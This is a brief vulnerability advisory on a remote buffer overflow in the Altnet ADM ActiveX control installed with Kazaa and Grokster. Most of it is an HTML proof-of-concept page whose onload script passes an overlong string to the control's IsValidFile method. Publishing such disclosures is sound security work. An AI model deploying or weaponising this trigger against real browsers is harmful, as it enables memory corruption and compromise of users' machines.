|
Altnet ADM ActiveX Control Remote Buffer Overflow Vulnerability
The following proof of concept is available: <HTML> <HEAD> This overrun occurs in \program files\Altnet\Download Manager\adm.exe This executable is installed along with Kazaa and Grokster. <META http-equiv=Content-Type content="text/html; charset=windows-1252"> <SCRIPT type=text/javascript> function init() { var foo = ""; for(var icount = 0; icount < 1; icount++) { foo = foo + "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaxxxx"; } var ngssoftware; ngssoftware = new ActiveXObject("ADM.ADM.1"); ngssoftware["IsValidFile"](foo); } //--> </SCRIPT> </HEAD> <BODY bgColor=#ffffff onload=init()> </BODY></HTML> |
|
Privacy Statement |